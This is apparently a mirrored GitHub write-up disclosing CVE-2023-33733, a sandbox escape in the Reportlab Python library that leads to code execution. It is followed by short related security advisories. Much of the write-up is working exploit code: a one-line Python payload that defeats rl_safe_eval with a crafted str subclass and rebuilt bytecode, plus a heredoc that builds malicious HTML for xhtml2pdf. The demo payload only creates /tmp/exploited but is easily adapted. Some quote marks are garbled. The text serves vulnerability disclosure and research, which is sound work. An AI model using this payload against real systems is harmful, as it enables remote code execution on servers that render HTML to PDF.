Headline
CVE-2023-33733: GitHub - c53elyas/CVE-2023-33733: CVE-2023-33733 reportlab RCE
Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.
CODE INJECTION VULNERABILITY IN REPORTLAB PYTHON LIBRARY
tl;dr This write-up details how an RCE in Reportlab - was found and exploited. Due to the prevalence of Reportlab in HTML to PDF processing, this vulnerability may be reachable in many applications that process PDF files, making this an important one to patch and look out for.
Introduction
A few days ago, during a web application audit we noticed that the application was using the Reportlab python library to perform the dynamic generation of PDF files from HTML input. The Reportlab was found to have a previously patched vulnerability leading to Code execution. which means that finding a bypass to the patch was pretty interesting from the attacker point of view as it would lead to the rediscovery of the code execution, especially the Reportlab library is also used in other applications and tools.
What is Reportlab
First thing first, a quick recap: Reportlab is an Open Source project that allows the creation of documents in Adobe’s Portable Document Format (PDF) using the Python programming language. It also creates charts and data graphics in various bitmap and vector formats as well as PDF.
Attacking Reportlab
The library has known in 2019 a similar exploit leading to remote code execution via the Color attribute of the HTML tags, the content of the attribute was directly evaluated as a python expression using eval function thus leading to code execution. To mitigate the issue Reportlab has implemented a sandbox calling it rl_safe_eval that is stripped from all python builtins functions and has multiple overridden builtin functions to permit the execution of the library safe code while stopping any access to dangerous functions and libraries that can subsequently lead to construction of dangerous python code:
An example of this prevention measures is that the builtin getattr function is overridden with a restricted function rl_getitem that prohibits access to any dangerous attributes of objects like the ones that start with __:
class __RL_SAFE_ENV__(object): __time_time__ = time.time __weakref_ref__ = weakref.ref __slicetype__ = type(slice(0)) def __init__(self, timeout=None, allowed_magic_methods=None): self.timeout = timeout if timeout is not None else self.__rl_tmax__ self.allowed_magic_methods = (__allowed_magic_methods__ if allowed_magic_methods==True else allowed_magic_methods) if allowed_magic_methods else [] #[…] # IN THIS LINE IT CAN BE OBSERVED THAT THE BUILTIN GETATR IS REPLACED WITH A CUSTOM FUNCTION # THAT CHECKS THE SAFETY OF THE PASSED ATTRIBUTE NAME BEFORE GETTING IT __rl_builtins__[‘getattr’] = self.__rl_getattr__ __rl_builtins__[‘dict’] = __rl_dict__
#\[...\]
def \_\_rl\_getattr\_\_(self, obj, a, \*args):
if isinstance(obj, strTypes) and a\=='format':
raise BadCode('%s.format is not implemented' % type(obj))
\# MULTIPLE CHECKS ARE DONE BEFORE FETCHING THE ATTRIBUTE AND RETURNING IT
\# TO THE CALLER IN THE SANDBOXED EVAL ENVIRONMENT
self.\_\_rl\_is\_allowed\_name\_\_(a)
return getattr(obj,a,\*args)
def \_\_rl\_is\_allowed\_name\_\_(self, name):
"""Check names if they are allowed.
If \`\`allow\_magic\_methods is True\`\` names in \`\_\_allowed\_magic\_methods\_\_\`
are additionally allowed although their names start with \`\_\`.
"""
if isinstance(name,strTypes):
\# NO ACCESS TO ATTRIBUTES STARTING WITH \_\_ OR MATCH A PREDEFINED UNSAFE ATTRIBUTES NAMES
if name in \_\_rl\_unsafe\_\_ or (name.startswith('\_\_')
and name!='\_\_'
and name not in self.allowed\_magic\_methods):
raise BadCode('unsafe access of %s' % name)
The Bug
The safe eval as described earlier sanitizes the environment from all dangerous functions so that executing code has no access to dangerous tools that can be used to execute malicious actions, however in case a bypass is found to those restrictions and an access to one of the original builtins functions is achieved, it would facilitate greatly the exploitation of the sandboxed environment.
One of the many overridden builtin classes is called type, if this class is called with one argument, it returns the type of an object. however in case it is called with three arguments, it returns a new type object. This is essentially a dynamic form of the class statement. In other words it can allow the creation of a new class that inherits from another class.
So the idea here is to create a new class called Word that inherits from str that when passed to the custom getattr it would bypass the checks and would allow the access to sensitive attributes like code.
Before the custom getattr in sandboxed eval returns the attribute it does some checks by calling rl_is_allowed_name to check the for safety of the called attribute before calling the python builtin getattr and returning the result.
def \_\_rl\_is\_allowed\_name\_\_(self, name):
"""Check names if they are allowed.
If \`\`allow\_magic\_methods is True\`\` names in \`\_\_allowed\_magic\_methods\_\_\`
are additionally allowed although their names start with \`\_\`.
"""
if isinstance(name,strTypes):
if name in \_\_rl\_unsafe\_\_ or (name.startswith('\_\_')
and name!='\_\_'
and name not in self.allowed\_magic\_methods):
raise BadCode('unsafe access of %s' % name)
To bypass the rl_is_allowed_name function, the Word class should:
- Always return False for calls to function startswith to bypass (name.startswith(‘__’)
- Should return False to its first call to eq to bypass the name in rl_unsafe, after the first call it should return the correct response because when eq is called by the python builtin getattr it should return the correct result.
- the hash should be he same of he hash of its underlying string
The following class fulfills these criteria:
Word = type('Word’, (str,), { ‘mutated’ : 1, 'startswith’: lambda self, x: False, ‘__eq__’ : lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, ‘mutate’ : lambda self: {setattr(self, 'mutated’, self.mutated - 1)}, ‘__hash__’ : lambda self: hash(str(self)) }) code = Word(‘__code__’) print(code == ‘__code__’) ## prints False print(code == ‘__code__’) ## prints True print(code == ‘__code__’) ## prints True print(code == ‘__code__’) ## prints True
print(code.startswith(‘__’)) ## prints False
The custom type function in the safe eval does not allow to be passed three arguments:
def \_\_rl\_type\_\_(self,\*args):
if len(args)\==1: return type(\*args)
raise BadCode('type call error')
A bypass for this was found by calling type on itself, allowing the retrieval of the original builtin type function:
orgTypeFun = type(type(1))
combining these two lines of code would give something like this:
orgTypeFun = type(type(1)) Word = orgTypeFun('Word’, (str,), { ‘mutated’ : 1, 'startswith’: lambda self, x: False, ‘__eq__’ : lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, ‘mutate’ : lambda self: {setattr(self, 'mutated’, self.mutated - 1)}, ‘__hash__’ : lambda self: hash(str(self)) })
Final Exploit
Now what is left is to write the exploit:
To do this a function will be reconstructed from the bytecode of a compiled one:
orgTypeFun = type(type(1)) Word = orgTypeFun('Word’, (str,), { 'mutated’: 1, 'startswith’: lambda self, x: False, '__eq__’: lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate’: lambda self: {setattr(self, 'mutated’, self.mutated - 1)}, '__hash__’: lambda self: hash(str(self)) }) codeattr = Word(‘__code__’) ftype = orgTypeFun(lambda: {None}) ctype = orgTypeFun(getattr(lambda: {None},codeattr))
# The byte code is of a function that looks like this # def exp(): # __import__(‘os’).system(‘touch /tmp/exploited’)
f = ftype(ctype(0, 0, 0, 0, 3, 67, b’t\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00’, (None, 'os’, ‘touch /tmp/exploited’), ('__import__’, ‘system’), (), '<stdin>’, ‘’, 1, b’\x12\x01’), {}) f()
However a multiline expression like this will not be executed in an eval context, to bypass this issue, list comprehension trick can be used, something like this:
[print(x) for x in [‘hellworld’]] # which would be equivalent to x=’helloworld’ print(x)
[[ print (x + ' ' + y) for y in [‘second var’]] for x in [‘first var’]] # which would be equivalent to x=’first var’ x=’second var’ print (x + ' ' + y)
With this technique the exploit code can be rewritten in one line of code like this (this is considered one line x) the multiline here is just formatting to increase readability of the exploit, The declarations should be read from bottom to top x) weird but this is how it works):
[ [ [ [ ftype(ctype(0, 0, 0, 0, 3, 67, b’t\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00’, (None, 'os’, ‘touch /tmp/exploited’), ('__import__’, ‘system’), (), '<stdin>’, ‘’, 1, b’\x12\x01’), {})() for ftype in [type(lambda: None)] ] for ctype in [type(getattr(lambda: {None}, Word(‘__code__’)))] ] for Word in [orgTypeFun('Word’, (str,), { 'mutated’: 1, 'startswith’: lambda self, x: False, '__eq__’: lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate’: lambda self: {setattr(self, 'mutated’, self.mutated - 1)}, '__hash__’: lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ]
POC
Please refer to the poc.py as it contains proof of concept that demonstrates the code execution (upon successful exploitation a file called exploited is created in /tmp/ ).
What Else?
A lot of apps and libraries use the Reportlab library for example xhtml2pdf utility function is vulnerable and can suffer from code execution while transforming malicious HTML to pdf
cat >mallicious.html <<EOF <para><font color="[ [ [ [ [ ftype(ctype(0, 0, 0, 0, 3, 67, b’t\\x00d\\x01\\x83\\x01\\xa0\\x01d\\x02\\xa1\\x01\\x01\\x00d\\x00S\\x00’, (none, 'os’, ‘touch /tmp/exploited’), ('__import__’, ‘system’), (), '<stdin>’, ‘’, 1, b’\\x12\\x01’), {})() for ftype in [type(lambda: none)] ] for ctype in [type(getattr(lambda: {none}, Word(‘__code__’)))] ] for Word in [orgTypeFun('Word’, (str,), { 'mutated’: 1, 'startswith’: lambda self, x: 1==0, '__eq__’: lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate’: lambda self: {setattr(self, 'mutated’, self.mutated - 1)}, '__hash__’: lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]]"> exploit </font></para> EOF
xhtml2pdf mallicious.html ls -al /tmp/exploited ``
Related news
Debian Linux Security Advisory 5791-1 - Elyas Damej discovered that a sandbox mechanism in ReportLab, a Python library to create PDF documents, could be bypassed which may result in the execution of arbitrary code when converting malformed HTML to a PDF document.
Ubuntu Security Notice 6196-1 - It was discovered that ReportLab incorrectly handled certain PDF files. An attacker could possibly use this issue to execute arbitrary code.
Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.
Cross Site Scripting (XSS) in the New Policy form in Microworld Technologies eScan management console 14.0.1400.2281 allows a remote attacker to inject arbitrary code via the vulnerable parameters type, txtPolicyType, and Deletefileval.